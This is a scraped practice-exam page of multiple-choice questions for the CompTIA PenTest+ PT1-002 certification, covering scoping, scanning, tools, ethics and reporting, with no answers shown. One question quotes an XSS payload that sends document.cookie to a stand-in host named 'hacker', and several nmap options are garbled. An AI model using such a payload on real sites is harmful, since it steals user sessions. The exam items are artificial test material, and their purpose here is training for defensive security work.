Is the PT1-002 practice exam free?

Yes. ExamCademy offers all 110 PT1-002 practice questions for free with a registered account. No payment needed. Optional supporter features add AI explanations and spaced repetition study tools.

How accurate are the PT1-002 practice questions?

All PT1-002 questions are community-created and reviewed by moderators to align with CompTIA's published exam objectives. The community continuously reports and fixes issues to keep content accurate and up to date.

How should I study for the PT1-002 exam?

Start by browsing practice questions to identify weak areas. Use spaced repetition (Learn Mode) to focus study time on topics you struggle with. Combine practice questions with official CompTIA documentation and hands-on experience for best results.

PT1-002 Practice Exam — Free 110+ Questions

110Practice Questions

3Study Modes

FreeTo Get Started

Topic:Sort:

Question 1

Planning and Scoping

Question 2

Tools and Code Analysis

Question 3

Planning and Scoping

Question 4

Information Gathering and Vulnerability Scanning

Question 5

Reporting and Communication

Question 6

Information Gathering and Vulnerability Scanning

Question 7

Information Gathering and Vulnerability Scanning

Question 8

Tools and Code Analysis

Question 9

Planning and Scoping

Question 10

Planning and Scoping

Question 11

Reporting and Communication

Question 12

Tools and Code Analysis

Question 13

Attacks and Exploits

Question 14

Reporting and Communication

Question 15

Attacks and Exploits

Question 16

Planning and Scoping

Question 17

Planning and Scoping

Question 18

Planning and Scoping

Question 19

Attacks and Exploits

Question 20

Tools and Code Analysis

Question 21

Information Gathering and Vulnerability Scanning

Question 22

Planning and Scoping

Question 23

Reporting and Communication

Question 24

Planning and Scoping

Question 25

Information Gathering and Vulnerability Scanning

Page 1 of 5 • Questions 1-25 of 110

1 2 3 4 5

→

Know a question that should be here? Contribute to this exam

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

A devices produce more heat and consume more power.
B devices are obsolete and are no longer available for replacement.
C protocols are more difficult to understand.
D devices may cause physical world effects.

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A <#
B <$
C
D #$
E #!

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

A A signed statement of work
B The correct user accounts and associated passwords
C The expected time frame of the assessment
D The proper emergency contacts for the client

A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

A nmap ג€"f ג€"sV ג€"p80 192.168.1.20
B nmap ג€"sS ג€"sL ג€"p80 192.168.1.20
C nmap ג€"A ג€"T4 ג€"p80 192.168.1.20
D nmap ג€"O ג€"v ג€"p80 192.168.1.20

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A Analyze the malware to see what it does.
B Collect the proper evidence and then remove the malware.
C Do a root-cause analysis to find out how the malware got in.
D Remove the malware immediately.
E Stop the assessment and inform the emergency contact.

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would
BEST support this task?

A Run nmap with the ג€"o, -p22, and ג€"sC options set against the target
B Run nmap with the ג€"sV and ג€"p22 options set against the target
C Run nmap with the --script vulners option set against the target
D Run nmap with the ג€"sA option set against the target

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools?
(Choose two.)

A Scraping social media sites
B Using the WHOIS lookup tool
C Crawling the client's website
D Phishing company employees
E Utilizing DNS lookup tools
F Conducting wardriving near the client facility

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

A The libraries may be vulnerable
B The licensing of software is ambiguous
C The libraries' code bases could be read by anyone
D The provenance of code is unknown
E The libraries may be unsupported
F The libraries may break the application

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A Whether the cloud service provider allows the penetration tester to test the environment
B Whether the specific cloud services are being used by the application
C The geographical location where the cloud services are running
D Whether the country where the cloud service is based has any impeding laws

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

A Forensically acquire the backdoor Trojan and perform attribution
B Utilize the backdoor in support of the engagement
C Continue the engagement and include the backdoor finding in the final report
D Inform the customer immediately about the backdoor

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:

Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: /
>
Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang=en>
<head>
<meta name=viewport content=width=device-width />
<meta http-equiv=Content-Type content=text/html; charset=utf-8 />
<title>WordPress › ReadMe</title>
<link rel=stylesheet href=wp-admin/css/install.css?ver=20100228 type=text/css />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A Burp Suite
B DirBuster
C WPScan
D OWASP ZAP

HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Question Image

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A Buffer overflows
B Cross-site scripting
C Race-condition attacks
D Zero-day attacks
E Injection flaws
F Ransomware attacks

Given the following code:
<SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A Web-application firewall
B Parameterized queries
C Output encoding
D Session tokens
E Input validation
F Base64 encoding

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

A The reverse-engineering team may have a history of selling exploits to third parties.
B The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D The reverse-engineering team will be given access to source code for analysis.

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

A Ensure the client has signed the SOW.
B Verify the client has granted network access to the hot site.
C Determine if the failover environment relies on resources not owned by the client.
D Establish communication and escalation procedures with the client.

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A NDA
B MSA
C SOW
D MOU

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

A Nmap
B tcpdump
C Scapy
D hping3

A penetration tester wrote the following script to be used in one engagement:

Question Image

Which of the following actions will this script perform?

A Look for open ports.
B Listen for a reverse shell.
C Attempt to flood open ports.
D Create an encrypted tunnel.

SIMULATION -
You are a penetration tester running port scans on a server.

INSTRUCTIONS -
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question Image

A penetration tester is reviewing the following SOW prior to engaging with a client:
Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.
Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

A Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
D Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
E Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
F Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A Reach out to the primary point of contact
B Try to take down the attackers
C Call law enforcement officials immediately
D Collect the proper evidence and add to the final report

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

A As backup in case the original documents are lost
B To guide them through the building entrances
C To validate the billing information with the client
D As proof in case they are discovered

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

A Wireshark
B Nessus
C Retina
D Burp Suite
E Shodan
F Nikto

PT1-002Preview

About the PT1-002 Exam

Question 1

Question 2

Question 3

Question 4

Question 5

Question 6

Question 7

Question 8

Question 9

Question 10

Question 11

Question 12

Question 13

Question 14

Question 15

Question 16

Question 17

Question 18

Question 19

Question 20

Question 21

Question 22

Question 23

Question 24

Question 25

PT1-002Preview

About the PT1-002 Exam

Mode Selection

Question 1

Question 2

Question 3

Question 4

Question 5

Question 6

Question 7

Question 8

Question 9

Question 10

Question 11

Question 12

Question 13

Question 14

Question 15

Question 16

Question 17

Question 18

Question 19

Question 20

Question 21

Question 22

Question 23

Question 24

Question 25